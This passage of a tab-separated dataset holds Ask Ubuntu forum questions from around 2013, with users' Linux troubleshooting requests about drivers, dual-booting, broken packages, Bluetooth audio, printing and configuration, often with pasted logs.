地址:192.168.169.2 广播:192.168.169.255 掩码:255.255.255.0 inet6 地址 : fe80 : :224:2cff : fead:8e80/64 scope : link up broadcast running multicast mtu:1500 跃点数:1 接收数据包:3306 错误:0 丢弃:0 过载:0 帧数:0 发送数据包:3229 错误:0 丢弃:0 过载:0 载波:0 碰撞:0 发送队列长度:1000 接收字节:3265844 ( 3.2 mb ) 发送字节:504828 ( 504.8 kb ) what other information should i offer , please tell me ? my english is not very well and i know very little about ubuntu .
368881	help with dual booting windows 8.1 professional and ubuntu 13.10	i recently installed a clean version of windows 8.1 professional on my lenovo y500 ( with samsung 256gb 840 pro ssd ) . i have windows all set up and running normally . i am trying to dual boot windows 8.1 and ubuntu 13.10 , but the installation procedure do n't allow me to either `` install alongside ... '' or shows my ssd partitions correctly when i chose the `` something else '' option . i have created a 25gb partition of free space in the windows disk manager , but on the installation screen on ubuntu , it shows the whole drive as a free space . i have tried installing with a burned .iso disk and a bootable usb , the results are the same for both . windows disk management screen : http : //imageshack.us/a/img855/9504/59zu.jpg the ubuntu installation screen : http : //imageshack.us/a/img62/2712/9g6i.jpg i 've ran into this problem before when trying to dual boot ubuntu and windows 7 professional a month ago . but i gave up and never resolved the issue . -- edit -- i tried what eero aaltonen suggested , and this is my result : ubuntu @ ubuntu : ~ $ sudo parted /dev/sda print warning : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? yes/no ? yes model : ata samsung ssd 840 ( scsi ) disk /dev/sda : 256gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags ubuntu @ ubuntu : ~ $
368882	parental controls for edubuntu 12.04 ?	my daughter 's birthday is coming up , and i wanted to give her a new ( old ) laptop , with edubuntu installed . i was hoping there was some built in parental controls since edubuntu is designed for kids and all , but i 'm not seeing anything . is there some parental control hidden inside ? do i need third party software ? i saw this https : //projects.gnome.org/nanny/ , but the software center reviews all say it does n't work with 12.04 . could someone point me in the right direction ? thanks !
368884	can not see certain files on usb mounted device ( mtp android xperia play )	i 'm using an emulator for ps2 and i was going to transfer my .iso files from my xperia play to ubuntu 12.04 . so i look for my .iso 's in the folder through file manager and it looks as it 's empty , but there is a notification on the top asking to the open picture viewer , because there are pictures in this folder . i can not see or interact with anything and there are no files are hidden . ps : to the forum mods : i am dyslexic and i find your requirement for exacting grammar and spelling unfair . it took a whole half hour just to get past your blocks .
368885	wireless disconnected ubuntu 12.4 lts	i 'm new to linux flavor , i have dual booted my laptop lenovo g580 with win & and ubuntu 12.04 lts . at the time of installation i was able to connect to my wifi but after installation complete , i 'm not able to connect to wifi . my wifi will get list when searched it ask credentials and all of a sudden it will say wireless disconnected.. ! ! can i get help on this ... ! ! ! thanks in advance ... ! !
368886	graphic system malfunction	i have installed ubuntu 12.04 with cinnamon . after a while i had a hang of the system and i could n't use the keyboard and mouse and had to hard reset the machine . immediately after that i had an error message that i work in low graphics mode , i tried fixing it with the xorg.conf file but no luck . i had uninstalled cinnamon , and reinstalled my ati driver but now i 'm on unity with the computer seeing only one screen of two and in the resolution of the second one ( since they are duplicated ) . i also disabled the screensaver , but still the screen goes blank after about 10 min . i tried to remove the cinnamon packages i see with dpkg but i get a message that they are not installed and nothing to remove . how can i fix my computer ? i would like not to reinstall but to fix the problem .
368889	why is n't the cppconn folder in /usr/include ?	i am new to c++ . i am trying to make a mysql connection . i found that it requires mysql-connector . i installed boost-dev-all . i have put my mysql-connector in local directory ~/bin . i have successfully installed it . but when i try to make mysql connection , i get an error : fatal : cppcon : directory missing on digging around , i understoodd cppconn folder has been missing from /usr/include . should i copy cppconn folder to /usr/include ? sudo cp /bin/mysql-connector /usr/include
368890	permission denied to open a text file	my program generates a file ( ex : file.txt ) , it is generated in a directory something like : a/b/c/file.txt and directory /a/ is changed to 777 permission mode . can anyone tell me why whenever a new file is generated inside the directories it is always bounded with permissions irrespective of out directory being permitted . hope its easy to understand . thanks in advance .
368893	radeon 7770 breaks when upgrading from 13.04 to 13.10	sorry if i am a bit verbose but i am trying to recollect and provide as much information . everything was working fine in 13.04 and i could even play dota2 on steam . since upgrading to 13.10 it has been a nightmare . radeon 7770 card gives a black screen of death when loading ubuntu . i am unable to get to a tty screen using the radeon 7770 card and i have tried multiple kernels . therefore , i was forced to used the inbuilt motherboard graphics card . on first load , there was lots of error and ubuntu had to run in low-res mode or some error like that appeared since the drivers installed was amd catalyst and fglrx . i removed them but i think it is incomplete and installed xorg files . so now , at least my ubuntu starts up flawlessly if i used the inbuilt motherboard graphics with no errors at all . i have tried changing lightdm to gdm , adding sleep , trying nomodeset , etc everything but it always still get stuck at the load screen without ability to tty if i use my radeon card . i am trying to install back my radeon 7770 card now and install the drivers for it . since i can not slot in the card and have the computer detect it and then install the drivers , i am trying to manually install the drivers before i slot in the card . i should have fglrx removed since there is no more fglrxinfo command . i have removed all the extra ppas ( i tried oibaf , etc before ) from software updates . right now , i have downloaded the latest amd drivers and done a sudo sh amd-driver-installer-catalyst-13-4-x86.x86_64.run -- buildpkg command and the deb files generate properly . but when i try to run sudo dpkg -i fglrx*.deb i get this error unpacking fglrx ( from fglrx_13.250-0ubuntu1_amd64.deb ) ... one or more files have been altered since installation . uninstall will not be completed . see /etc/ati/fglrx-uninstall.log for details . dpkg : error processing fglrx_13.250-0ubuntu1_amd64.deb ( -- install ) : subprocess new pre-installation script returned error exit status 1 preparing to replace fglrx-amdcccle 2:13.200-0ubuntu1 ( using fglrx-amdcccle_13.250-0ubuntu1_amd64.deb ) ... unpacking replacement fglrx-amdcccle ... preparing to replace fglrx-dev 2:13.200-0ubuntu1 ( using fglrx-dev_13.250-0ubuntu1_amd64.deb ) ... unpacking replacement fglrx-dev ... dpkg : dependency problems prevent configuration of fglrx-amdcccle : fglrx-amdcccle depends on fglrx ; however : package fglrx is not installed . dpkg : error processing fglrx-amdcccle ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of fglrx-dev : fglrx-dev depends on fglrx ; however : package fglrx is not installed . dpkg : error processing fglrx-dev ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : fglrx_13.250-0ubuntu1_amd64.deb fglrx-amdcccle fglrx-dev i have tried going to synaptic to fix the broken packages to no avail . if i try to purge fglrx now i get this error reading package lists ... done building dependency tree reading state information ... done e : unable to locate package fglrx_13.250-0ubuntu1_amd64.deb e : could n't find any package by regex 'fglrx_13.250-0ubuntu1_amd64.deb' e : unable to locate package fglrx-amdcccle_13.250-0ubuntu1_amd64.deb e : could n't find any package by regex 'fglrx-amdcccle_13.250-0ubuntu1_amd64.deb' e : unable to locate package fglrx-dev_13.250-0ubuntu1_amd64.deb e : could n't find any package by regex 'fglrx-dev_13.250-0ubuntu1_amd64.deb' e : unable to locate package fglrx-installer_13.250-0ubuntu1_amd64.changes e : could n't find any package by regex 'fglrx-installer_13.250-0ubuntu1_amd64.changes' i have also tried looking into the dpkg status file as advised in one post to look for fglrx stuff and remove the lines containing it but i have n't been able to find any . can someone tell me perhaps the best way to figure out what graphic drivers i have installed since i might have messed up buy overinstalling and how to reset it to a blank state . my inbuilt graphics works fine so 13.10 is stable is just that i ca n't use the 7770 with it ! am thinking of installing windows after all this frustration . thanks . edit one : ok i think i have partially solved the issue so if anyone is experiencing the same problems as me this might help . the issue is that the drivers either work for my onboard card or my radeon 7770 card . originally upgrading to 13.10 broke , so it was easier to fix the onboard card drivers first so that i can attempt to get to a terminal . after that , i been trying to fix the radeon 7770 card . what i did from the last portion is to sudo sh /usr/share/ati/fglrx-uninstall.sh -- force this caused the onboard graphics card to break . i would load into a black screen with just my x cursor . however , when i inserted my radeon 7770 card now , it would at least also get me to the black screen with the x cursor . which is positive ! ( weirdly enough ) . so now i could tty in with the radeon card installed . i went to the deb files and could do a sudo dpkg -i fglrx*.deb i also reinstalled the unity desktop . on reboot , i could see the screen now with my radeon 7770 ! there is still lots of errors popping up and i have to scale the screen but seems positive . edit two so i have been trying to install steam after getting the radeon 7770 card to work . word of caution is changing the drivers in the software and updates section to fglrx-updates fails badly .
368902	lost access to sudo	sudo : unable to resolve host i think i need to edit the /etc/hosts file to make an entry for 127.0.1.1 pc name . but how can i do that if i ca n't access sudo ? it seems to have gone since i updated to 13.10 . i have tried nano , which still does n't work .
368905	what is the ubuntu archive manager ?	this is a bit of a stupid question , but i do n't use ubuntu any more , and i do n't know what program ubuntu uses to make and extract archives , so : can anybody tell me ? edit : i mean the package name that apt-get uses
368906	installation zabbix	i am trying to install a zabbix monitoring system on my ubuntu . but when i try to install it . i get this error : the following have unmet dependencies : zabbix-server-mysql : depends : libsnmp15 ( > = 5.4.3~dfsg ) but it is no installable reccomends snmptt but it is not going to be installed unable to correct problems , you have held broken packages . i already tried : apt-get update -f apt-get install snmpd -f but nothing seems to work , anyone has a solution for me ? thanks
368913	after re-installing ubuntu 13.10 , stuck at grub rescue , boot-repair did n't work !	because i could not get the wifi login work , i thought i will reinstall ubuntu , with internet connection to have updated drivers for wireless & graphics etc . i have deleted earlier linux partitions usings gparted and re-installed ubuntu 13.10 , exactly following the same steps as i did earlier , making a 100gb /home on dev/sda and pointing root to /dev/sdb ( ssd ) and swap on dev/sda/ . installing boot on /dev/sdb . but , somehow i think the grub is either corrupted or removed because i am unable to boot the laptop to any os now . i get the following message : '' no such device '' xxxxx followed by huge hex number grub rescue > when i type ls on grub rescue > prompt , i can see hd0 & hd1 , but thats about it . i tried boot-repair but it is unable to fix the problem . the following log is generated via boot-repair create log : boot-repair log i am unable to boot into windows or linux at the moment and need help to fix the grub so i can boot ! !
368915	how can i subscribe to launchpad-hosted project announcements via email ?	there are a number of projects i use or am interested in that make announcements via launchpad . random example : https : //launchpad.net/steadyflow/+announcements these announcments are available as rss feeds , and i could use an rss > email service for this , but i would prefer not to . is there a way to subscribe/unsubscribe to project announcements via launchpad itself ?
368917	ubuntu 13.10 , logout button on top taskbar missing	upgraded ubuntu 13.04 to 13.10 , the `` settings '' button with shutdown/settings/login/logout is missing from the taskbar . it was the button that used to be next to the time/calender button , left right side . can it be configured or loaded ?
368923	how to monitor web traffic in a lan network for nursery school ?	i have created a simple lan wireless network with a router in a nursery school where kids can use internet to play and learn new things . so the teacher tell me that he need to see all websites visited in real time from all kid 's computer thus he can block certain websites . i tryed some tools like wireshark and iptraf but these tools are for very geeks and does n't show websites but only ip address . could you help me ?
368924	ubuntu keeps asking for password but it 's deactivated - and show me error message	yesterday i deactivated the ubuntu 12.04 password because my parents come to my home and i need let they use the computer without password . so , i go to system settings '' - > `` user accounts , unlocked the session and removed my password ( `` login without ask for password '' , something like this ) . but something is wrong , now i can start ubuntu without type my password , but when i try to type something ( in the first time of system initialization ) system asks me for password to unlock keyboard . when i type my password and press enter , system give to me an error message ! ! ( incorrect password ) . i 'm trying to follow this tuto , but i ca n't continue because my system says my password is wrong . so , what can i do to solve this issue ?
368925	how i can fix `` e : internal error , no file name for libc6 ``	hello all please i need your help to fix this problem i have 2 broken packages system and i ca n't reinstall them or make any other option : update , upgrade , install & remove app ... . ubuntu 12.04.3 i have not found any solutions please help me sudo apt-get install -f smaouh @ linux : ~ $ sudo apt-get install -f [ sudo ] password for smaouh : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libopenal1 libpam-winbind libao-common gnome-exe-thumbnailer libqca2-plugin-ossl gir1.2-champlain-0.12 libmagickcore4 libmagickwand4 libmagickcore4-extra libcapi20-3 python-unidecode libopenal-data liblqr-1-0 gir1.2-gtkchamplain-0.12 unixodbc wine-gecko2.21 libchamplain-0.12-0 python-glade2 imagemagick-common libosmesa6 oss-compat gimp-help-common esound-common gimp-help-en libmpg123-0 ttf-mscorefonts-installer imagemagick winbind libodbc1 fonts-droid fonts-unfonts-core libchamplain-gtk-0.12-0 libclutter-gtk-1.0-0 gir1.2-gtkclutter-1.0 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 386 not upgraded . 4 not fully installed or removed . after this operation , 0b of additional disk space will be used . dpkg : error processing libc6 ( -- configure ) : libc6 : amd64 2.15-0ubuntu10.5 can not be configured because libc6 : i386 is in a different version ( 2.15-0ubuntu10.4 ) dpkg : dependency problems prevent configuration of libc-dev-bin : libc-dev-bin depends on libc6 ( > > 2.15 ) ; however : package libc6 is not configured yet . libc-dev-bin depends on libc6 ( < < 2.16 ) ; however : package libc6 is not configured yet . dpkg : error processing libc-dev-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libc6-dev : libc6-dev depends on libc6 ( = 2.15-0ubuntu10.5 ) ; however : package libc6 is not configured yet . libc6-dev depends on libc-dev-bin ( = 2.15-0ubuntu10.5 ) ; however : package libc-dev-bin is not configured yet . dpkg : error processing libc6-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libc6-i386 : libc6-i386 depends on libc6 ( = 2.15-0ubuntu10.5 ) ; however : package libc6 is not configured yet . dpkg : error processing libc6-i386 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already errors were encountered while processing : libc6 libc-dev-bin libc6-dev libc6-i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) smaouh @ linux : ~ $
368927	difference between installing cuda using nvidia-cuda-toolkit and the .run file	my laptop has a ubuntu 13.10 installed and has a nvidia 630m graphics card . i have been trying to install cuda . i installed it using : sudo apt-get install nvidia-cuda-dev nvidia-cuda-doc nvidia-cuda-gdb nvidia-cuda-toolkit what i want to know is what is the difference between installing it using the above command and the procedure given at the nvidia page here
368929	wol does n't wake pc ( keyboard does ) . how to fix ?	i manage to get my pc to hibernate through pm-hibernate -- quirk-s3-bios . suspend strangely enough does n't work ( pc reboots immediately to a new state and ubuntu starts a disk check , but that 's only as side information ) . when hibernated , as soon as i touch the keyboard , the pc resumes correctly from hibernation . however , sending a wol packet does n't wake the pc . how can i detect and fix what is wrong ? mobo : asrock b75 pro3-m , rtl8111e driver installed from realtek site , ubuntu 13.04 64 bit . many thanks !
368930	remove/add indicator icons	i 'm trying out ubuntu 13.10 . i would like to remove some of the default indicator icons in the upper right corner . is there an easy way to do it ? and then i would like to add some other icons ( guake , pidgin , shutter , dropbox , kupfer etc. ) . i have already got the dropbox icon but it 's in grey . i would like the default blue icon with the green marker . but if i change theme in ubuntu-tweak or gnome-tweak then the nice shutdown-icon disappears . in linux mint this just works : - ) .
368932	fan always run with ubuntu 12.04 lts	my laptop is dell vostro 3560 . i have just installed ubuntu 12.04 lts on it , everything is good except fan . it always run , always makes some noises . it 's not normal when comparing with windows 8.1 . how can it solve this problem ? cpu 's temperature is not high . it 's only 47 c
368937	13.04 logitech bluetooth speaker adapter pairing but no mixer output	i had to change [ general ] enable = socket in /etc/bluetooth/audio.conf to get it to pair . but now that they are i do n't get an output in pavucontrol . d : [ pulseaudio ] bluetooth-util.c : registering /mediaendpoint/hfpag on adapter /org/bluez/3855/hci0 . d : [ pulseaudio ] bluetooth-util.c : registering /mediaendpoint/hfphs on adapter /org/bluez/3855/hci0 . d : [ pulseaudio ] bluetooth-util.c : registering /mediaendpoint/a2dpsource on adapter /org/bluez/3855/hci0 . d : [ pulseaudio ] bluetooth-util.c : registering /mediaendpoint/a2dpsink on adapter /org/bluez/3855/hci0 . e : [ pulseaudio ] bluetooth-util.c : org.bluez.media.registerendpoint ( ) failed : org.bluez.error.alreadyexists : already exists e : [ pulseaudio ] bluetooth-util.c : org.bluez.media.registerendpoint ( ) failed : org.bluez.error.alreadyexists : already exists e : [ pulseaudio ] bluetooth-util.c : org.bluez.media.registerendpoint ( ) failed : org.bluez.error.alreadyexists : already exists e : [ pulseaudio ] bluetooth-util.c : org.bluez.media.registerendpoint ( ) failed : org.bluez.error.alreadyexists : already exists d : [ pulseaudio ] bluetooth-util.c : dbus : property 'state ' changed to value 'disconnected' d : [ pulseaudio ] bluetooth-util.c : dbus : property 'state ' changed to value 'disconnected' d : [ pulseaudio ] bluetooth-util.c : dbus : property 'state ' changed to value 'disconnected' d : [ pulseaudio ] bluetooth-util.c : dbus : property 'state ' changed to value 'disconnected' d : [ pulseaudio ] bluetooth-util.c : dbus : property 'state ' changed to value 'connected' d : [ pulseaudio ] bluetooth-util.c : dbus : property 'state ' changed to value 'connected' d : [ pulseaudio ] bluetooth-util.c : unknown bluetooth minor device class 0 d : [ pulseaudio ] module-card-restore.c : not restoring profile for card bluez_card.c8_84_47_15_b7_34 , because already set . i : [ pulseaudio ] module-card-restore.c : restoring port latency offsets for card bluez_card.c8_84_47_15_b7_34 . i : [ pulseaudio ] card.c : created 2 `` bluez_card.c8_84_47_15_b7_34 '' w : [ pulseaudio ] module-bluetooth-device.c : profile has no transport d : [ pulseaudio ] core-subscribe.c : dropped redundant event due to change event . i : [ pulseaudio ] card.c : changed profile of card 2 `` bluez_card.c8_84_47_15_b7_34 '' to off i : [ pulseaudio ] module.c : loaded `` module-bluetooth-device '' ( index : # 22 ; argument : `` address=c8:84:47:15 : b7:34 profile=a2dp '' ) . i : [ alsa-source ] alsa-source.c : scheduling delay of 10,06ms , you might want to investigate this to improve latency ... i : [ alsa-source ] ratelimit.c : 5 events suppressed i : [ alsa-source ] alsa-source.c : overrun ! i : [ alsa-source ] alsa-source.c : increasing minimal latency to 2,00 ms d : [ alsa-source ] alsa-source.c : latency set to 20,00ms d : [ alsa-source ] alsa-source.c : hwbuf_unused=62008 d : [ alsa-source ] alsa-source.c : setting avail_min=442 what can i do to get it working ? regards , edit : > > > 2 sink ( s ) available . index : 0 name : < alsa_output.pci-0000_01_00.1.hdmi-stereo-extra1 > driver : < module-alsa-card.c > [ ... cut ... ] index : 1 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > [ ... cut ... ] edit2 : in pavucontrol i have `` ( 34 ) logitech adapter '' . if i change the profile from `` off '' to `` highfidelity playback ( a2dp ) '' then i get this message from pulseaudio : w : [ pulseaudio ] module-bluetooth-device.c : profile has no transport edit3 : funny . disconnecting the device via blueman crashes pulseaudio : e : [ pulseaudio ] hook-list.c : assertion 'hook- > n_firing == 0 ' failed at pulsecore/hook-list.c:51 , function pa_hook_done ( ) . aborting . edit4 : upgrade to 13.10 did n't fix the problem either . there seems to be some incompatibility with bluez and pulseaudio and certain hardware ... edit5 : flo @ io2 : ~ $ bt-autoconnect -v ( bt-autoconnect.py:11935 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:3274:48 : expected ' , ' in color definition bt-autoconnect 1.0.1 scanning : c8:84:47:15 : b7:34 17193981.46 : ( < type 'exceptions.indexerror ' > , indexerror ( 'list index out of range ' , ) , < traceback object at 0x26a3170 > ) unable to run pulseaudio cli 17193981.46 : found bt-device : /org/bluez/10082/hci0/dev_c8_84_47_15_b7_34 17193981.46 : connecting to dbus : /org/bluez/10082/hci0/dev_c8_84_47_15_b7_34 17193993.18 : ( < class 'dbus.exceptions.dbusexception ' > , dbusexception ( 'connect failed ' , ) , < traceback object at 0x26a3200 > ) 17193994.18 : ( < class 'dbus.exceptions.dbusexception ' > , dbusexception ( 'connect failed ' , ) , < traceback object at 0x26a3170 > ) 17193995.18 : ( < class 'dbus.exceptions.dbusexception ' > , dbusexception ( 'connect failed ' , ) , < traceback object at 0x26a3248 > ) 17193996.18 : ( < class 'dbus.exceptions.dbusexception ' > , dbusexception ( 'connect failed ' , ) , < traceback object at 0x26a31b8 > ) 17193996.2 : [ 'c8:84:47:15 : b7:34 ' , '5 ' , 'n ' , 'n ' , 'n ' ] no pulseaudio daemon running , or not running as session daemon .
368940	dell alps touchpad not working	i have a dell 17r se with ubuntu 13.04 . the touchpad is recognized as ps/2 mouse out of the box , giving just normal touchpad behaviour , but no tap to click , no scrolling , etc . most answers related to that issue suggest trying an alps driver from dahetral.com : http : //www.dahetral.com/public-download for installing i followed the steps on this page : https : //www.linuxwind.org/html/dell-touchpad-driver-for-ubuntu-13-04.html now my xinput looks like this : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=13 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=14 [ slave pointer ( 2 ) ] ⎜ ↳ logitech bluetooth mouse m555b id=16 [ slave pointer ( 2 ) ] my touchpad is n't working at all now , just the two hardware buttons for left and right mouse buttons work . interestingly also the tap to click functions works , but only in the address bar of nautilus , nowhere ( ! ) else . what can i do ? i would even switch back to initial state , where at least the basic touchpad functionality worked , i i knew , how to get there .
368941	clonezilla fail to restore disk after dist-upgrade	my boss who think he is a linux divinity upgraded a ubuntu server from 13.04 to 13.10 without asking me first and performed all of his actions in root . since he did this clonezilla is unable to perform the `` restore-disk '' operation . pxe boot works , but then it freezes at 0 % . what could i do ?
368943	ejabberd wo n't look at my host_config option	i 'm new with ejabberd . what i want is to have a host myhost.domain.com which has an ldap authentication method . this all works fine if i modify the global options in authentication section in my ejabberd.cfg file . i am able to create two clients ( defined in my ldap directory ) , and comunicate between them . like i said , this works fine . but by aplying this authentication method globaly , it means that every hostname that i declare must use that . so i 'm looking at { host_config , `` myhost.domain.com '' ... } but somehow i ca n't get ejabberd to look at that configuration , it just skips it . if i declare it like : { xhost_config , ... } , than in my ejabberd.log file i get a bad return error ( so it knows that the configuration is there , but it wo n't look at it ) . any suggestions ? thanks .
368944	i can not install ubuntu 13.10	i have lenovo g505 with a6 . i can not install ubuntu 13.10 . i can not even try it . it shows the initial ubuntu logo . after that machine does not responding . i tried both uefi and legacy boot .
368945	how to set system-wide proxy address using shell script ?	i want to set system proxy address through my qt application . so i was wondering if i could write a script which can be executed by my application every time to change the proxy address . i tried : # ! /bin/sh echo `` # generated by application '' export $ 1 echo `` proxy address $ { 1 } but this script was not successful . i think it was unable to execute `` export '' command . can anyone help me resolving this issue ?
368947	configuring novel iprint client on ubuntu 13.10	recently i have struggled a lot to make novel iprint client to work on my laptop . i need it to use follow me printers in our university ( you can take your print form any printer ) . using this tutorial from novel , i tried to convert the rpm package and install it on ubuntu 13.04 & 13.10 . the post install script from installing generated deb package had a typo which i saw in post install messages and i fixed that . now i have the client running . to see the client ui i installed cinnamon desktop ( because unity does not have system tray and old solutions did'nt work to whitelist novel clinet ) . i have iprint plugin installed on firefox as well ( i copied the shared object files to plugin directories ) . i try installing printers from provided ipp url ( which lists available printers on the server ) with no success . after clicking the printer name i see this : i have various errors : formerly firefox used to asked my network username/password for installing ssl printer but now it returns this : iprint printer - the printer is currently not available . however i can install non-ssl version but the printer location is either empty or points to : file : ///dev/null even if i change it to the exact address which i see on working machines still it prints nothing . i have tried the novel command line tool , iprntcmd to print . it is being installed at : /opt/novell/iprint/bin/ msadeghi @ werkstatt : /opt/novell/iprint/bin $ ./iprntcmd -- addprinter ipp : //iprint.rz.hs-offenburg.de/ipp/follow-me\ -\ ipp iprntcmd v05.04.00 adding printer ipp : //iprint.rz.hs-offenburg.de/ipp/follow-me - ipp . added printer ipp : //iprint.rz.hs-offenburg.de/ipp/follow-me - ipp successfully . it adds the printer with empty location and again no print . what i found interesting is the log file at ~/.iprint/errors.txt with strange errors which i hope somebody here can understand . when i try to install the ssl printer i receive these logs ( note that hp is my local printer and has nothing to do with iprint ) : thu oct 31 11:02:03 2013 trace info : iprint.c , line 6690 group info : iprint-lib error code : 4096 ( 0x1000 ) user id : 1000 error msg : iprint lib - bad uri type supplied ( not ipp : , http : , or https : ) . debug msg : iprintinterpreturi for file : ///dev/null - unknown port type - file thu oct 31 11:02:03 2013 trace info : iprint.c , line 6800 group info : iprint-lib error code : 4096 ( 0x1000 ) user id : 1000 error msg : iprint lib - bad uri type supplied ( not ipp : , http : , or https : ) . debug msg : iprintinterpreturi for hp : /usb/hp_laserjet_1018 ? serial=kp103a1 - no port type specified thu oct 31 11:02:05 2013 trace info : iprint.c , line 6690 group info : iprint-lib error code : 4096 ( 0x1000 ) user id : 1000 error msg : iprint lib - bad uri type supplied ( not ipp : , http : , or https : ) . debug msg : iprintinterpreturi for file : ///dev/null - unknown port type - file thu oct 31 11:02:05 2013 trace info : iprint.c , line 6800 group info : iprint-lib error code : 4096 ( 0x1000 ) user id : 1000 error msg : iprint lib - bad uri type supplied ( not ipp : , http : , or https : ) . debug msg : iprintinterpreturi for hp : /usb/hp_laserjet_1018 ? serial=kp103a1 - no port type specified thu oct 31 11:02:06 2013 trace info : mydoreq.c , line 676 group info : clib error code : 0 ( 0x0 ) user id : 1000 error msg : success debug msg : mycupsdofilerequest - httpreconnect failed ( 0 ) thu oct 31 11:02:06 2013 trace info : mydoreq.c , line 1293 group info : cups-ipp error code : 1282 ( 0x502 ) user id : 1000 error msg : iprint printer - the printer is currently not available . debug msg : mycupsdofilerequest - ipp service unavailable thu oct 31 11:02:06 2013 trace info : iprint.c , line 6690 group info : iprint-lib error code : 4096 ( 0x1000 ) user id : 1000 error msg : iprint lib - bad uri type supplied ( not ipp : , http : , or https : ) . debug msg : iprintinterpreturi for file : ///dev/null - unknown port type - file thu oct 31 11:02:06 2013 trace info : iprint.c , line 6800 group info : iprint-lib error code : 4096 ( 0x1000 ) user id : 1000 error msg : iprint lib - bad uri type supplied ( not ipp : , http : , or https : ) . debug msg : iprintinterpreturi for hp : /usb/hp_laserjet_1018 ? serial=kp103a1 - no port type specified thu oct 31 11:02:08 2013 trace info : iprint.c , line 6690 group info : iprint-lib error code : 4096 ( 0x1000 ) user id : 1000 error msg : iprint lib - bad uri type supplied ( not ipp : , http : , or https : ) . debug msg : iprintinterpreturi for file : ///dev/null - unknown port type - file thu oct 31 11:02:08 2013 trace info : iprint.c , line 6800 group info : iprint-lib error code : 4096 ( 0x1000 ) user id : 1000 error msg : iprint lib - bad uri type supplied ( not ipp : , http : , or https : ) . debug msg : iprintinterpreturi for hp : /usb/hp_laserjet_1018 ? serial=kp103a1 - no port type specified i should say that my friend can print using the same instructions on crunchbang easily and another guy on 12.04 lts but with more struggling . it worked for me on linux mint maya with my old laptop as well . is there anybody out there who can help me to solve these problems ? i am really disappointed with novell and our university support . ps . i had the same problemwith 13.04 . no matter if i am within the network or i connect with vpn , i have the same issues .
368949	mess up between mysql server and phpmyadmin	0 down vote favorite after i installed xamp on my ubuntu 12.10 it was working fine with mysql . i could start mysql- sudo mysql -uroot -p. i connet it using 127.0.0.1:3306 recently i installed phpmyadmin . when i start it it shows access denied . i got solution from web : sudo /etc/init.d/apache2 stop sudo /etc/init.d/mysql stop sudo /etc/init.d/proftpd stop sudo /opt/lampp/lampp start now i start phpmyadmin it starts but now i could not connect with mysql on terminal . additionally phpmyadmin database does not shows all existing databse on mysql . can anyone tell me what 's going on here ? i am using ubuntu 12.10
368951	zsh aliases does n't work from .zshrc file	i want to create an alias to mount some remote file systems locally . i placed lines like this in my .zshrc file : alias remfs='sshfs rem : ~/mnt/sshfs/rem' but when i run remfs , i get an error `` command not found '' . i also tried to put them in .zshenv without any luck .
368953	does ubuntu server work on hp microserver g7 n54l ?	i want to purchase a hp microserver g7 n54l , but i want to be sure that ubuntu server will work fine on it ! i want to use the systemen as mysql database server .
368956	gnome 3.10 : can i get the old system status menu back without downgrading ?	as the title specifies . i prefer the system status menu i am used to in gnome 3.8 : not the new one that comes with gnome 3.10 : can i achieve this without downgrading to gnome 3.8 ?
368958	configure akai mpk 61 on lmms	does anybody know how to configure an akai mpk ( keyboard controller ) with lmms ? at the begining i thought , it will be automatic , because it is usb midi-class compliant , what means : 'no nedd of 3rd party drivers ' , but i guess i 'm wrong ... any help ? thanks !
368962	ubuntu 12.04.3 drivers for lenovo g500 with i3 3110m cpu	i 'm thinking in buying a lenovo g500 with i3 3110m cpu , i asked lenovo and they said they do n't have drivers for linux yet and seems g500 is not a certified hardware yet . but i 'm pretty sure that there are lot of g500 owners who has already installed successfully ubuntu 12.04.3 64bits , which drivers you used to install ubuntu ?
368968	double tapping same key in blender not working ( ubuntu 13.10 , 64bit )	working with blender 2.68a noticed strange thing , there is some shortcut combinations to execute particular commands like edge slide for example where you should tap `` g '' key two times . what happens is that if you tap the keyboard key two times quiet fast blender cancels the action , in other words it does n't recognize double tap as double tap ... from other hand if i do it like tap.. short pause .. tap , then all is working fine . on another computer i have 13.04 , everything works fine there , but on 13.10 - it 's a problem . did some reading here , tried enable/disable things in universal access as described - no effect at all . any bright ideas towards solving this issue ? thanks .
368971	conky in gnome 3.10 shell	i have asked this question over on superuser but figured since the question is more ubuntu-centric i should ask it here as well . i have installed ubuntu 13.10 and recently installed gnome 3.10 on my hpnc6320 . i have the 5.2 lua interpreter installed as well and conky . both from the ubuntu apt-get tool . i was following the conky tutorial from unix men i followed every step . i chose the ubuntu set of conky and lua scripts . i put them in the locations and changed the files like it said . i also changed a parameter in /etc/fonts/conf.d/50-user.conf as outlined herebecause i was getting an error about reading configurations from ~/.fonts.conf is deprecated . this changed fixed that as far as i can tell . where i am having trouble is when i run conky , the output i get is : jesse @ nc6320 ~ : $ conky conky : desktop window ( 100001d ) is subwindow of root window ( 7f ) conky : window type - override conky : drawing to created window ( 0x4200001 ) conky : drawing to double buffer i am new to conky and gnome . what do i have to do to get this conky script working ? thank you for any input
368974	reserved uids/gids and semi-reserverd uids/gids	when installing a new system , depending on selected packages , some uids for some packages are n't always the same . eg : 'sshd ' may be uid 102 , sometimes another value . on the other hand , 'www-data ' is always '33' how can i figure out all packages with reserved uids ( ie www-data ) and all the packages that generate a pseudo-random administration uid ( < 1000 , ie : sshd ) ? this goes for gids too . is there a list of all those packages ? or is there an aptitude command that let 's me find out all those packages , even the ones not installed ? thanks
